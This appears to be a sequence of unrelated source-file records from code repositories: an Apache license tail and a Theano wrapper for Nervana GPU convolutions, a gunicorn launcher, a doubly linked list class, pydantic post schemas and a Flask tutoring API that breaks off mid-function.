3. Grant of Patent License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
(except as stated in this section) patent license to make, have made,
use, offer to sell, sell, import, and otherwise transfer the Work,
where such license applies only to those patent claims licensable
by such Contributor that are necessarily infringed by their
Contribution(s) alone or by combination of their Contribution(s)
with the Work to which such Contribution(s) was submitted. If You
institute patent litigation against any entity (including a
cross-claim or counterclaim in a lawsuit) alleging that the Work
or a Contribution incorporated within the Work constitutes direct
or contributory patent infringement, then any patent licenses
granted to You under this License for that Work shall terminate
as of the date such litigation is filed.
4. Redistribution. You may reproduce and distribute copies of the
Work or Derivative Works thereof in any medium, with or without
modifications, and in Source or Object form, provided that You
meet the following conditions:
(a) You must give any other recipients of the Work or
Derivative Works a copy of this License; and
(b) You must cause any modified files to carry prominent notices
stating that You changed the files; and
(c) You must retain, in the Source form of any Derivative Works
that You distribute, all copyright, patent, trademark, and
attribution notices from the Source form of the Work,
excluding those notices that do not pertain to any part of
the Derivative Works; and
(d) If the Work includes a "NOTICE" text file as part of its
distribution, then any Derivative Works that You distribute must
include a readable copy of the attribution notices contained
within such NOTICE file, excluding those notices that do not
pertain to any part of the Derivative Works, in at least one
of the following places: within a NOTICE text file distributed
as part of the Derivative Works; within the Source form or
documentation, if provided along with the Derivative Works; or,
within a display generated by the Derivative Works, if and
wherever such third-party notices normally appear. The contents
of the NOTICE file are for informational purposes only and
do not modify the License. You may add Your own attribution
notices within Derivative Works that You distribute, alongside
or as an addendum to the NOTICE text from the Work, provided
that such additional attribution notices cannot be construed
as modifying the License.
You may add Your own copyright statement to Your modifications and
may provide additional or different license terms and conditions
for use, reproduction, or distribution of Your modifications, or
for any such Derivative Works as a whole, provided Your use,
reproduction, and distribution of the Work otherwise complies with
the conditions stated in this License.
5. Submission of Contributions. Unless You explicitly state otherwise,
any Contribution intentionally submitted for inclusion in the Work
by You to the Licensor shall be under the terms and conditions of
this License, without any additional terms or conditions.
Notwithstanding the above, nothing herein shall supersede or modify
the terms of any separate license agreement you may have executed
with Licensor regarding such Contributions.
6. Trademarks. This License does not grant permission to use the trade
names, trademarks, service marks, or product names of the Licensor,
except as required for reasonable and customary use in describing the
origin of the Work and reproducing the content of the NOTICE file.
7. Disclaimer of Warranty. Unless required by applicable law or
agreed to in writing, Licensor provides the Work (and each
Contributor provides its Contributions) on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
implied, including, without limitation, any warranties or conditions
of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
PARTICULAR PURPOSE. You are solely responsible for determining the
appropriateness of using or redistributing the Work and assume any
risks associated with Your exercise of permissions under this License.
8. Limitation of Liability. In no event and under no legal theory,
whether in tort (including negligence), contract, or otherwise,
unless required by applicable law (such as deliberate and grossly
negligent acts) or agreed to in writing, shall any Contributor be
liable to You for damages, including any direct, indirect, special,
incidental, or consequential damages of any character arising as a
result of this License or out of the use or inability to use the
Work (including but not limited to damages for loss of goodwill,
work stoppage, computer failure or malfunction, or any and all
other commercial damages or losses), even if such Contributor
has been advised of the possibility of such damages.
9. Accepting Warranty or Additional Liability. While redistributing
the Work or Derivative Works thereof, You may choose to offer,
and charge a fee for, acceptance of support, warranty, indemnity,
or other liability obligations and/or rights consistent with this
License. However, in accepting such obligations, You may act only
on Your own behalf and on Your sole responsibility, not on behalf
of any other Contributor, and only if You agree to indemnify,
defend, and hold each Contributor harmless for any liability
incurred by, or claims asserted against, such Contributor by reason
of your accepting any such warranty or additional liability.
END OF TERMS AND CONDITIONS
APPENDIX: How to apply the Apache License to your work.
To apply the Apache License to your work, attach the following
boilerplate notice, with the fields enclosed by brackets "[]"
replaced with your own identifying information. (Don't include
the brackets!) The text should be enclosed in the appropriate
comment syntax for the file format. We also recommend that a
file or class name and description of purpose be included on the
same "printed page" as the copyright notice for easier
identification within third-party archives.
Copyright [yyyy] [name of copyright owner]
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import numpy as np
import theano
import theano.sandbox.cuda as cuda
from theano.sandbox.cuda.basic_ops import (host_from_gpu, gpu_from_host,
gpu_contiguous, gpu_alloc_empty)
import theano.misc.pycuda_init
from nervanagpu import nervanagpu
from nervanagpu.layers import _magic32, _flatten
from math import ceil
from operator import mul
from gemm import to_gputensor, NervanaOp, lib
def _compute_kernel_settings(N, C, K,
D=1, H=1, W=1,
T=1, R=1, S=1,
pad_d=0, pad_h=0, pad_w=0,
str_d=1, str_h=1, str_w=1,
grid_P=0, grid_Q=0, update_size=None):
"""
Most of this has been copy-pasted from nervanagpu's ConvLayer class.
It exists to avoid having to instantiate the layer classes inside the
Theano Ops.
"""
assert N % 8 == 0, "N dim must be multiple of 8"
assert K % 8 == 0, "K dim must be multiple of 8"
# Compute the output spatial dimensions
M = int(ceil(float(D - T + 1 + 2*pad_d) / str_d))
P = int(ceil(float(H - R + 1 + 2*pad_h) / str_h))
Q = int(ceil(float(W - S + 1 + 2*pad_w) / str_w))
NCK = (N,C,K)
TRS = (T,R,S)
DHW = (D,H,W)
MPQ = (M,P,Q)
padding = (pad_d, pad_h, pad_w)
strides = (str_d, str_h, str_w)
dimI = (C,D,H,W,N)
dimF = (C,T,R,S,K)
dimO = (K,M,P,Q,N)
dimI2 = (C*D*H*W,N)
dimF2 = (C*T*R*S,K)
dimO2 = (K*M*P*Q,N)
dimIew = (C*D*H,W*N)
dimFew = (C*T*R,S*K)
dimOew = (K*M*P,Q*N)
sizeI = reduce(mul, dimI, 1)
sizeF = reduce(mul, dimF, 1)
sizeO = reduce(mul, dimO, 1)
nOut = reduce(mul, MPQ, 1) * K
# precompute some multiplications for fast constant memory access
WN = W*N
HWN = H*WN
DHWN = D*HWN
RS = R*S
RST = T*RS
CRST = C*RST
PQ = P*Q
PM = P*M
PQM = M*PQ
QN = Q*N
PQN = P*QN
MPQN = M*PQN
# I can easily get the kernels working with larger values here..
# But this is what version 1 is coded to support.
assert PQM < 2**16, "Integer division is faster with 16bit numerators"
# Kernels can be recoded to support 32bit numerators at
# some performance loss.
assert CRST+8 < 2**16, "Integer division is faster with 16bit numerators"
# precompute grid dimensions
grid_N64 = N // 64 + (N % 64 != 0)
grid_K64 = K // 64 + (K % 64 != 0)
grid_C64 = CRST // 64 + (CRST % 64 != 0)
grid_N128 = N // 128 + (N % 128 != 0)
grid_K128 = K // 128 + (K % 128 != 0)
grid_C128 = CRST // 128 + (CRST % 128 != 0)
#TODO: add more 128x128 kernels for better performance at fp32.
fprop_grid = (PQM, grid_K64, grid_N64)
bprop_grid = (PQM, grid_C128, grid_N64)
fprop_block = (64, 1, 1)
bprop_block = (128, 1, 1)
fprop_size = "K64_N64"
bprop_size = "C128_N64"
#TODO: tune this further
if (update_size is None or update_size == "C64_K64" or update_size == "C128_K64") and \
(CRST <= 64 or K <= 64 or (K % 64 == 0 and K % 128 != 0)):
updat_size = "C128_K64"
updat_grid = [0, grid_C128, grid_K64]
updat_block = 128
else:
updat_size = "C128_K128"
updat_grid = [0, grid_C128, grid_K128]
updat_block = 256
if grid_P == 0 or grid_Q == 0:
grid_P = P
grid_Q = Q // 4
# TitanX optimization: make grid multiple of 24 for small grids
# TODO: explore L2 utilization here:
# TODO: add 980, 750, etc optimizations
if nervanagpu._get_sm_count() == 24:
grid_PQ = grid_P * grid_Q
if grid_PQ < 30:
grid_P = 6
grid_Q = 4
elif grid_PQ < 54:
grid_P = 8
grid_Q = 6
elif grid_PQ < 78:
grid_P = 9
grid_Q = 8
elif grid_PQ <= 108:
grid_P = 12
grid_Q = 8
if grid_P >= P: grid_P = P
if grid_Q >= Q: grid_Q = Q
grid_PQ = grid_P * grid_Q
grid_PQM = updat_grid[0] = grid_PQ * M
updat_grid = tuple(updat_grid)
updat_block = (updat_block,1,1)
# precompute the magic numbers and shift amounts for integer division
magic_RST = _magic32(CRST+8, RST)
magic_RS = _magic32(RST+32, RS)
magic_S = _magic32(RS+32, S)
magic_PQ = _magic32(PQM, PQ)
magic_Q = _magic32(PQ, Q)
magic_PQu = _magic32(grid_PQM, grid_PQ)
magic_Qu = _magic32(grid_PQ, grid_Q)
# generate the convolution kernel args for fprop and bprop
kernel_args = _flatten([
N, K, D, H, W, WN, HWN, DHWN,
C, CRST, RST, magic_RST, RS, magic_RS, S, magic_S,
pad_d, pad_h, pad_w, str_d, str_h, str_w,
P, Q, PQ, QN, PQN, MPQN, magic_Q, magic_PQ,
grid_P, grid_Q, grid_PQ])
# update uses slightly different args
update_args = _flatten([
N, K, D, H, W, WN, HWN, DHWN,
C, CRST, RST, magic_RST, RS, magic_RS, S, magic_S,
pad_d, pad_h, pad_w, str_d, str_h, str_w,
P, Q, PQ, QN, PQN, MPQN, magic_Qu, magic_PQu,
grid_P, grid_Q, grid_PQ])
# shared lookup table size
lut_size = (RST // 32 + (RST % 32 != 0)) * 32 * 4
return {
'fprop': (fprop_size, fprop_grid, fprop_block),
'bprop': (bprop_size, bprop_grid, bprop_block),
'updat': (updat_size, updat_grid, updat_block),
'kernel_args': kernel_args,
'update_args': update_args,
'lut_size': lut_size,
'output_size': (M, P, Q),
}
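# Hedged usage sketch (dimensions must satisfy the N % 8 == 0 and K % 8 == 0 asserts;
# actually running it requires a CUDA device visible to nervanagpu):
# settings = _compute_kernel_settings(N=128, C=8, K=64, H=96, W=96, R=3, S=3)
# settings['output_size']  # -> (M, P, Q) output spatial dims, here (1, 94, 94)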
def _conv(settings, A, B, C, alpha=1.0, relu=False, op="fprop"):
"""
Adapted from the nervanagpu code to avoid using the Layer classes.
A lot of copied code!
settings is generated by _compute_kernel_settings().
"""
assert B.dtype == C.dtype == np.float32
assert op in ["fprop", "bprop", "updat"]
clss = "sconv" # hardcode fp32 for now
flags = 0
if C.rounding:
flags |= 1
if relu:
flags |= 2
# find the correct settings for this operation
size, grid, block = settings[op]
if op in ["fprop", "bprop"]:
args = settings['kernel_args']
shared = settings['lut_size']
elif op == "updat":
args = settings['update_args']
shared = 0
kernel = nervanagpu._get_conv_kernel(lib.cubin_path, clss, op, size)
params = [grid, block, nervanagpu._get_rand_state(),
C.gpudata, A.gpudata, B.gpudata,
alpha, flags]
params.extend(args)
kernel.prepared_call(*params, shared_size=shared)
class NervanaConvBase(NervanaOp):
__props__ = ('padding', 'strides')
def __init__(self, padding=(0, 0, 0), strides=(0, 0, 0)):
self.padding = padding
self.strides = strides
class NervanaConv(NervanaConvBase):
def make_node(self, img, kern):
img = cuda.basic_ops.gpu_contiguous(
cuda.basic_ops.as_cuda_ndarray_variable(img))
kern = cuda.basic_ops.gpu_contiguous(
cuda.basic_ops.as_cuda_ndarray_variable(kern))
if img.type.ndim != 5:
raise TypeError('img must be 5D tensor')
if kern.type.ndim != 5:
raise TypeError('kern must be 5D tensor')
broadcastable = [kern.type.broadcastable[-1], False, False, False, img.type.broadcastable[-1]]
return theano.Apply(self, [img, kern], [cuda.CudaNdarrayType(broadcastable)()])
def make_thunk(self, node, storage_map, _, _2):
inputs = [storage_map[v] for v in node.inputs]
outputs = [storage_map[v] for v in node.outputs]
bottom, weights = inputs
top, = outputs
settings_shapes = [None]
settings = [None]
def thunk():
bottom_shape = bottom[0].shape
weights_shape = weights[0].shape
C , D, H, W, N = bottom_shape
C_, T, R, S, K = weights_shape
if self.padding == 'valid':
pad_d, pad_h, pad_w = 0, 0, 0
elif self.padding == 'full':
pad_d, pad_h, pad_w = T - 1, R - 1, S - 1
elif self.padding == 'half':
pad_d, pad_h, pad_w = T // 2, R // 2, S // 2
else:
pad_d, pad_h, pad_w = self.padding
str_d, str_h, str_w = self.strides
assert C_ == C
if (settings_shapes[0] is None or
settings_shapes[0] != (N, C, K, D, H, W, T, R, S)):
# shape change, recompute settings
settings_shapes[0] = (N, C, K, D, H, W, T, R, S)
settings[0] = _compute_kernel_settings(N, C, K,
D, H, W,
T, R, S,
pad_d, pad_h, pad_w,
str_d, str_h, str_w)
top_shape = (K,) + settings[0]['output_size'] + (N,)
# only allocate if there is no previous allocation of the right size.
if top[0] is None or top[0].shape != top_shape:
top[0] = cuda.CudaNdarray.zeros(top_shape)
bottom_nervana = to_gputensor(bottom[0])
weights_nervana = to_gputensor(weights[0])
top_nervana = to_gputensor(top[0])
_conv(settings[0], bottom_nervana, weights_nervana, top_nervana,
alpha=1.0, relu=False, op="fprop")
thunk.inputs = inputs
thunk.outputs = outputs
thunk.lazy = False
return thunk
def grad(self, inp, grads):
bottom, weights = inp
top, = grads
top = gpu_contiguous(top)
d_bottom = NervanaConvGradI(self.padding, self.strides)(weights, top, bottom.shape[1:-1])
d_weights = NervanaConvGradW(self.padding, self.strides)(bottom, top, weights.shape[1:-1])
return d_bottom, d_weights
class NervanaConvGradI(NervanaConvBase):
def make_node(self, kern, topgrad, shape):
kern = cuda.basic_ops.as_cuda_ndarray_variable(kern)
topgrad = cuda.basic_ops.as_cuda_ndarray_variable(topgrad)
if kern.type.ndim != 5:
raise TypeError('kern must be 5D tensor')
if topgrad.type.ndim != 5:
raise TypeError('topgrad must be 5D tensor')
depth_height_width = [shape[0], shape[1], shape[2]]
broadcastable = [kern.type.broadcastable[0], False, False, False, topgrad.type.broadcastable[-1]]
return theano.Apply(self, [kern, topgrad] + depth_height_width, [cuda.CudaNdarrayType(broadcastable)()])
def make_thunk(self, node, storage_map, _, _2):
inputs = [storage_map[v] for v in node.inputs]
outputs = [storage_map[v] for v in node.outputs]
weights, top = inputs[:2]
bottom, = outputs
settings_shapes = [None]
settings = [None]
def thunk():
weights_shape = weights[0].shape
top_shape = top[0].shape
D, H, W = int(inputs[2][0]), int(inputs[3][0]), int(inputs[4][0])
C, T, R, S, K = weights_shape
K_, M, P, Q, N = top_shape
if self.padding == 'valid':
pad_d, pad_h, pad_w = 0, 0, 0
elif self.padding == 'full':
pad_d, pad_h, pad_w = T - 1, R - 1, S - 1
elif self.padding == 'half':
pad_d, pad_h, pad_w = T // 2, R // 2, S // 2
else:
pad_d, pad_h, pad_w = self.padding
str_d, str_h, str_w = self.strides
assert K_ == K
if (settings_shapes[0] is None or
settings_shapes[0] != (N, C, K, D, H, W, T, R, S)):
# shape change, recompute settings
settings_shapes[0] = (N, C, K, D, H, W, T, R, S)
settings[0] = _compute_kernel_settings(N, C, K,
D, H, W,
T, R, S,
pad_d, pad_h, pad_w,
str_d, str_h, str_w)
bottom_shape = (C, D, H, W, N)
# only allocate if there is no previous allocation of the right size.
if bottom[0] is None or bottom[0].shape != bottom_shape:
bottom[0] = cuda.CudaNdarray.zeros(bottom_shape)
bottom_nervana = to_gputensor(bottom[0])
weights_nervana = to_gputensor(weights[0])
top_nervana = to_gputensor(top[0])
_conv(settings[0], weights_nervana, top_nervana, bottom_nervana,
alpha=1.0, relu=False, op="bprop")
thunk.inputs = inputs
thunk.outputs = outputs
thunk.lazy = False
return thunk
class NervanaConvGradW(NervanaConvBase):
def make_node(self, img, topgrad, shape):
img = cuda.basic_ops.as_cuda_ndarray_variable(img)
topgrad = cuda.basic_ops.as_cuda_ndarray_variable(topgrad)
if img.type.ndim != 5:
raise TypeError('img must be 5D tensor')
if topgrad.type.ndim != 5:
raise TypeError('topgrad must be 5D tensor')
depth_height_width = [shape[0], shape[1], shape[2]]
broadcastable = [img.type.broadcastable[0], False, False, False, topgrad.type.broadcastable[0]]
return theano.Apply(self, [img, topgrad] + depth_height_width, [cuda.CudaNdarrayType(broadcastable)()])
def make_thunk(self, node, storage_map, _, _2):
inputs = [storage_map[v] for v in node.inputs]
outputs = [storage_map[v] for v in node.outputs]
bottom, top = inputs[:2]
weights, = outputs
settings_shapes = [None]
settings = [None]
def thunk():
bottom_shape = bottom[0].shape
top_shape = top[0].shape
T, R, S = int(inputs[2][0]), int(inputs[3][0]), int(inputs[4][0])
C , D, H, W, N = bottom_shape
K, M, P, Q, N_ = top_shape
if self.padding == 'valid':
pad_d, pad_h, pad_w = 0, 0, 0
elif self.padding == 'full':
pad_d, pad_h, pad_w = T - 1, R - 1, S - 1
elif self.padding == 'half':
pad_d, pad_h, pad_w = T // 2, R // 2, S // 2
else:
pad_d, pad_h, pad_w = self.padding
str_d, str_h, str_w = self.strides
assert N_ == N
if (settings_shapes[0] is None or
settings_shapes[0] != (N, C, K, D, H, W, T, R, S)):
# shape change, recompute settings
settings_shapes[0] = (N, C, K, D, H, W, T, R, S)
settings[0] = _compute_kernel_settings(N, C, K,
D, H, W,
T, R, S,
pad_d, pad_h, pad_w,
str_d, str_h, str_w)
weights_shape = (C, T, R, S, K)
# only allocate if there is no previous allocation of the right size.
if weights[0] is None or weights[0].shape != weights_shape:
weights[0] = cuda.CudaNdarray.zeros(weights_shape)
bottom_nervana = to_gputensor(bottom[0])
weights_nervana = to_gputensor(weights[0])
top_nervana = to_gputensor(top[0])
_conv(settings[0], bottom_nervana, top_nervana, weights_nervana,
alpha=1.0, relu=False, op="updat")
thunk.inputs = inputs
thunk.outputs = outputs
thunk.lazy = False
return thunk
# TODO: test how much of a problem the dimshuffles are in a real network (does Theano avoid copy operations? It seems like it does for the cuda-convnet wrappers...)
# TODO: implement an optimization to swap it in so T.nnet.conv.conv2d can be used?
# TODO: built in relu support (with optimization to enable it?)
def nervana_conv(input, filters, padding=None, strides=1, dimshuffle=True):
ndim = input.ndim
if ndim not in [3, 4, 5]:
raise RuntimeError("inputs should be 3D, 4D or 5D")
if ndim != filters.ndim:
raise RuntimeError("inputs and filters should have the same dimensionality")
cdim = ndim - 2 # actual convolution dimensionality
# modify padding and strides tuples for 3D convolution
if isinstance(padding, str):
if padding == "same":
padding = "half"
assert padding in ['full', 'valid', 'half']
else:
if isinstance(padding, int):
padding = (padding,) * cdim
elif isinstance(padding, tuple):
assert len(padding) == cdim
padding = ((0,) * (3 - cdim)) + padding
if isinstance(strides, int):
strides = (strides,) * cdim
elif isinstance(strides, tuple):
assert len(strides) == cdim
strides = ((1,) * (3 - cdim)) + strides
if dimshuffle:
axes = range(1, ndim) + [0]
input = input.dimshuffle(*axes)
filters = filters.dimshuffle(*axes)
# go from ndim dimensions to 5 dimensions by 1-padding
if ndim == 3:
new_input_shape = (input.shape[0], 1, 1, input.shape[1], input.shape[2])
new_filters_shape = (filters.shape[0], 1, 1, filters.shape[1], filters.shape[2])
elif ndim == 4:
new_input_shape = (input.shape[0], 1, input.shape[1], input.shape[2], input.shape[3])
new_filters_shape = (filters.shape[0], 1, filters.shape[1], filters.shape[2], filters.shape[3])
elif ndim == 5:
new_input_shape = input.shape
new_filters_shape = filters.shape
input = input.reshape(new_input_shape)
filters = filters.reshape(new_filters_shape)
op = NervanaConv(padding=padding, strides=strides)
out = op(input, filters)
# go from 5 dimensions back to ndim dimensions by removing the added ones
# using dimshuffle and slicing for this instead leads to hard-to-debug errors
if ndim == 3:
new_out_shape = (out.shape[0], out.shape[3], out.shape[4])
elif ndim == 4:
new_out_shape = (out.shape[0], out.shape[2], out.shape[3], out.shape[4])
elif ndim == 5:
new_out_shape = out.shape
out = out.reshape(new_out_shape)
if dimshuffle:
axes = [ndim - 1] + range(0, ndim - 1)
out = out.dimshuffle(*axes)
return out
if __name__ == "__main__":
import theano.tensor as T
from theano.sandbox.cuda import dnn
input_shape = (128, 8, 96, 96)
filter_shape = (64, 8, 3, 3)
padding = "valid" # (1, 1)
strides = (1, 1)
# input_shape = (32, 16, 48, 48)
# filter_shape = (24, 16, 3, 3)
# padding = (1, 1)
# strides = (1, 1)
print "fprop"
x = theano.shared(np.random.normal(0, 1, input_shape).astype(theano.config.floatX))
w = theano.shared(np.random.normal(0, 1, filter_shape).astype(theano.config.floatX))
y_cudnn = dnn.dnn_conv(x, w, border_mode=padding, subsample=strides, conv_mode='cross')
y_nervana_raw = nervana_conv(x, w, padding=padding, strides=strides)
y_nervana = gpu_from_host(y_nervana_raw)
val_cudnn = np.array(y_cudnn.eval())
val_nervana = np.array(y_nervana.eval())
assert np.allclose(val_cudnn, val_nervana)
print "fprop without dimshuffle"
x_nodimshuffle = theano.shared(x.get_value().transpose(1, 2, 3, 0)) # c01b
w_nodimshuffle = theano.shared(w.get_value().transpose(1, 2, 3, 0)) # c01b
y_nervana_nodimshuffle = gpu_from_host(nervana_conv(x_nodimshuffle, w_nodimshuffle, padding=padding, strides=strides, dimshuffle=False))
val_nervana_nodimshuffle = np.array(y_nervana_nodimshuffle.eval()).transpose(3, 0, 1, 2)
assert np.allclose(val_nervana, val_nervana_nodimshuffle)
print "backprop inputs"
gi_cudnn = T.grad(T.mean(y_cudnn**2), x)
gi_nervana = T.grad(T.mean(y_nervana_raw**2), x)
gival_cudnn = np.array(gi_cudnn.eval())
gival_nervana = np.array(gi_nervana.eval())
assert np.allclose(gival_cudnn, gival_nervana)
print "backprop weights"
gw_cudnn = T.grad(T.mean(y_cudnn**2), w)
gw_nervana = T.grad(T.mean(y_nervana_raw**2), w)
gwval_cudnn = np.array(gw_cudnn.eval())
gwval_nervana = np.array(gw_nervana.eval())
assert np.allclose(gwval_cudnn, gwval_nervana)
# %timeit y_cudnn.eval() -> 47.0 ms
# %timeit y_nervana.eval() -> 61.3 ms
# %timeit y_nervana_nodimshuffle.eval() -> 23.6 ms
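    # Reading the timings above: with the data already in the c01b layout the
    # kernels expect (dimshuffle=False), the op runs ~2.5x faster than the
    # dimshuffled bc01 path and about 2x faster than cuDNN on this shape.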
|
[
"sanderdieleman@gmail.com"
] |
sanderdieleman@gmail.com
|
7aa212786905e87c1e1736fc67737d33fa121905
|
f163960d077a4217ec54f16f5b1e61b3a6edcce4
|
/venv/bin/gunicorn_paster
|
228b70966bbd81c44f4289a7e5051522bc9b2a0e
|
[] |
no_license
|
drj17/league_tracker
|
a020c3fc7ae4c2405f56ffbccff9f06e0f4c7377
|
6bac3b9e88cb5d7a53b80b34c2557d226ed8c711
|
refs/heads/master
| 2021-05-08T09:40:29.027473
| 2017-10-25T20:49:47
| 2017-10-25T20:49:47
| 107,171,980
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 256
|
#!/Users/davidjanas/league-tracker/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from gunicorn.app.pasterapp import run
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(run())
|
[
"davidjanasr@gmail.com"
] |
davidjanasr@gmail.com
|
|
7a90c5b9dec84a9caa29ff8fbc9d4e6bce5d1cc6
|
48446536f9d89dedcc2e0e2f68dea99526b66e37
|
/structure/DoublyLinkedList.py
|
493289a9cede0d970c6e0473eaec236052421c6b
|
[
"MIT"
] |
permissive
|
Jaidev810/Data-Structures-package
|
24e3dcaba6a440a858b7bbe6d126d3c661c8e115
|
f651615275817f182662892b2b57b200310d3dba
|
refs/heads/main
| 2023-03-02T16:02:09.974413
| 2021-02-15T16:37:08
| 2021-02-15T16:37:08
| 336,035,126
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,276
|
py
|
class Node:
def __init__(self, val: int):
self.val = val
self.prev = None
self.next = None
class DoublyLinkedList:
def takeinput(self) -> Node:
inputlist = [int(x) for x in input().split()]
head = None
temp = None
for curr in inputlist:
if curr == -1:
break
Newnode = Node(curr)
if head is None:
head = Newnode
temp = head
else:
temp.next = Newnode
Newnode.prev = temp
temp = temp.next
return head
def printLL(self, head: Node) -> None:
temp = head
while temp is not None:
print(temp.val, end='->')
temp = temp.next
print("None")
def getLength(self, head: Node) -> int:
count = 0
temp = head
while temp is not None:
count += 1
temp = temp.next
        return count
def getMiddle(self, head: Node) -> int:
slow = head
fast = head
while fast and fast.next is not None:
slow = slow.next
fast = fast.next.next
return slow.val
    def reverseLL(self, head: Node) -> Node:
        # Swap the prev/next pointers of every node; the old tail becomes
        # the new head.
        new_head = head
        curr = head
        while curr is not None:
            curr.prev, curr.next = curr.next, curr.prev
            new_head = curr
            curr = curr.prev  # prev now points at the original next node
        return new_head
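
# Minimal usage sketch (assumption: run interactively; takeinput() reads a
# space-separated list from stdin terminated by -1, e.g. "1 2 3 -1"):
if __name__ == '__main__':
    dll = DoublyLinkedList()
    head = dll.takeinput()
    dll.printLL(head)                   # 1->2->3->None
    print(dll.getLength(head))          # 3
    print(dll.getMiddle(head))          # 2
    dll.printLL(dll.reverseLL(head))    # 3->2->1->None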
|
[
"jaidevchaudhary810@gmail.com"
] |
jaidevchaudhary810@gmail.com
|
f2e9d57da8c25b307fc6615d861bd06423993923
|
06927b2c6ab0ac9fbf2746ea38a32eb974a57690
|
/ConfTool_Open.sikuli/ConfTool_Open.py
|
18e3372be86df8c4f5e984e2bd8d022c50470ce7
|
[] |
no_license
|
OldFeelLee/sikuliProject
|
ad104a1b0d70ce177150052aed663e8d0c842e02
|
8941cab54131638894c8852eb43129b6bfa84f54
|
refs/heads/master
| 2020-03-15T06:12:53.409283
| 2018-10-30T00:45:05
| 2018-10-30T00:45:05
| 132,002,509
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 452
|
py
|
from sikuli import *
import datetime
import string
import errorConst
import currentTime
import fileLog
import existsFunc
def ConfToolOpen():
fileLog.status = "ConfToolOpen"
App.open("C:\IDIS Solution Suite\Client\G2ProblemReporter.exe")
wait(5)
existsFunc.whileNotExsits_type("1524447598736.png","1524447609584.png",Key.ENTER)
wait(2)
existsFunc.whileNotExists("1524447630007.png","1524447634504.png")
fileLog.status = None
|
[
"leehunpill@idis.co.kr"
] |
leehunpill@idis.co.kr
|
951b8e0db40b2e770368adcadb51d50a6816d639
|
2fc7fab5bda38404588f066da9501cd53e0b3c12
|
/app/posts/schemas.py
|
d83fcae42ed082caa940f8c66f653ca3f07b26e4
|
[
"MIT"
] |
permissive
|
UKnowWhoIm/FastAPI-Blog
|
356c8a9e4ce846a43790da0d48e483d800d45b51
|
e0f9653b6fdbe445148b6e0789da49515f3fd87d
|
refs/heads/main
| 2023-02-03T10:44:23.240562
| 2020-12-21T03:35:50
| 2020-12-21T03:35:50
| 322,341,001
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 354
|
py
|
from datetime import datetime
from typing import Optional
from pydantic import BaseModel
class PostBase(BaseModel):
title: str
content: str
class PostCreate(PostBase):
pass
class Post(PostBase):
uid: int
time_stamp: datetime
author_uid: int
class Config:
orm_mode = True
class PostUpdate(PostBase):
pass
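
# Usage sketch (assumption: `row` is a SQLAlchemy-style ORM object with
# matching attribute names). orm_mode = True lets pydantic read attributes
# instead of requiring a dict:
#
#     post = Post.from_orm(row)
#     post.dict()  # {'title': ..., 'content': ..., 'uid': ..., ...}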
|
[
"51323747+UKnowWhoIm@users.noreply.github.com"
] |
51323747+UKnowWhoIm@users.noreply.github.com
|
7633c1f6a8146068706af993e1f18e6d41fd56be
|
b5ce03fad3c14b07e8ded6258716eb63a8ba1525
|
/.history/app_20210908045601.py
|
86d2750206c06c77130c8c846c3fa950a886a04d
|
[] |
no_license
|
saraalmuraytib/FSND-Capstone-Project
|
0d70058a080d3d91004e7d8bfbf38dfd3f9092fc
|
4a18217c7aa83899cc3f134c6caa710a2521a8fd
|
refs/heads/main
| 2023-07-28T01:20:03.838641
| 2021-09-10T01:33:26
| 2021-09-10T01:33:26
| 402,197,885
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,132
|
py
|
'''
* General Specifications *
** Models will include at least…
    * Two classes with primary keys and at least two attributes each
* [Optional but encouraged] One-to-many or many-to-many relationships between classes
** Endpoints will include at least…
* Two GET requests --> Get Subjects, Get Tutors based on selected Subject
* One POST request -->
* One PATCH request -->
* One DELETE request -->
** Roles will include at least…
* Two roles with different permissions -->
* Permissions specified for all endpoints
** Tests will include at least….
* One test for success behavior of each endpoint
* One test for error behavior of each endpoint
* At least two tests of RBAC for each role
'''
import os
from flask import Flask, request, abort, jsonify, render_template
from flask_sqlalchemy import SQLAlchemy
from flask_cors import CORS
#------------------------
from Database.models import *
# create and configure the app
app = Flask(__name__)
CORS(app)
setup_db(app)
Migrate(app, db)
'''
!! NOTE THIS WILL DROP ALL RECORDS AND START YOUR DB FROM SCRATCH
!! NOTE THIS MUST BE UNCOMMENTED ON FIRST RUN
!! Running this function will add one
'''
#db_drop_and_create_all()
#----------------------- ROUTES -----------------------
#-------------------- Get Requests --------------------
@app.route('/', methods=['GET'])
def index():
return '<h1>Welcome to Virtual Tutor</h1>'
'''
    GET /subjects
it should be a public endpoint
returns status code 200 and json {"success": True, "subjects": subjects }
'''
@app.route('/subjects')
def get_subjects():
subjects = Subject.query.all()
if len(subjects) == 0:
abort(404)
return jsonify({
'success': True,
'Subjects': {subject.id: subject.name for subject in subjects}
})
'''
GET /subjects/<int:subject_id>/tutors
it should get tutors based on subject.
'''
@app.route('/subjects/<int:subject_id>/tutors', methods=['GET'])
def get_tutors_based_on_subject(subject_id):
subject = Subject.query.filter(Subject.id == subject_id).one_or_none()
if subject is None:
abort(404)
else:
tutors = Tutor.query.filter(Tutor.subject_id == str(subject_id)).all()
return jsonify({
'success': True,
'Tutors': [tutor.format() for tutor in tutors],
'total_Tutor': len(tutors),
'Subject': subject.name
})
@app.route('/tutor/<int:tutor_id>/appointments', methods=['GET'])
def get_appointments_tutor(tutor_id):
tutor = Tutor.query.filter(Tutor.id == tutor_id).one_or_none()
if tutor is None:
abort(404)
else:
appointments = Appointments.query.filter(
Appointments.tutor_id == str(tutor_id)).all()
if len(appointments) == 0:
return jsonify({
'success': True,
'Total Appointments': len(appointments)
})
else:
